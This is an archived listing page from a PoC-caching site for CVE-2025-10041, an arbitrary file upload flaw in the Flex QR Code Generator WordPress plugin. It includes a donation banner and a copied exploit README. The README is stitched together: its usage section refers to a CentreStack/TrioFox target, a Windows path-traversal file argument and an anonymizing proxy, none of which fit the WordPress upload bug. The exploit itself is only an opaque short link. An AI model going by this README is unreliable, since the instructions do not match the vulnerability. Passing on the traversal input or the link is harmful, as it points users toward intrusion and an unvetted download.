Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2025-10041 PoC — WordPress plugin Flex QR Code Generator 代码问题漏洞

Source
Associated Vulnerability
Title:WordPress plugin Flex QR Code Generator 代码问题漏洞 (CVE-2025-10041)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台具有在基于PHP和MySQL的服务器上架设个人博客网站的功能。WordPress plugin是一个应用插件。 WordPress plugin Flex QR Code Generator 1.2.5及之前版本存在代码问题漏洞,该漏洞源于save_qr_code_to_db函数缺少文件类型验证,可能导致未经验证的攻击者上传任意文件并执行远程代码。
Readme
# CVE-2025-10041

### Overview
Vulnerability in the Flex QR Code Generator plugin for WordPress involving arbitrary file uploads due to missing file type validation in the save_qr_code_to_db() function.
An unauthenticated attacker can exploit this vulnerability to upload arbitrary files to the WordPress site's server, potentially leading to remote code execution.

Affected versions: all plugin versions up to and including version 1.2.5.


### Requirements
- Python 3.8+
- Libraries: requests, argparse (install via `pip install -r requirements.txt`)

### Usage
- Install dependencies: `pip install -r requirements.txt`
- Run the exploit: `python exploit.py --target <target_url> --file "/path/to/Web.config"`

Options:
- `--target`: URL of the vulnerable CentreStack/TrioFox instance.
- `--file`: Relative path to the file to include (e.g., "../../../../Windows/system.ini" for testing).
- `--proxy`: Optional HTTP proxy for anonymization.


### Ethical Use Warning
- This script is a proof-of-concept for CVE-2025-10041 for educational and authorized security testing purposes.
- **Do not use this script on systems without explicit permission from the system owner.**
- Misuse may violate laws, including the Computer Fraud and Abuse Act (CFAA) in the United States or similar laws elsewhere.
- Always obtain written consent before testing any system.

### PoC Exploit - [href](https://tinyurl.com/5bnst39v)

File Snapshot

[4.0K] /data/pocs/6283399db4bbc1807d9dae1ef119ac6443512ff3 └── [1.4K] README.md 0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.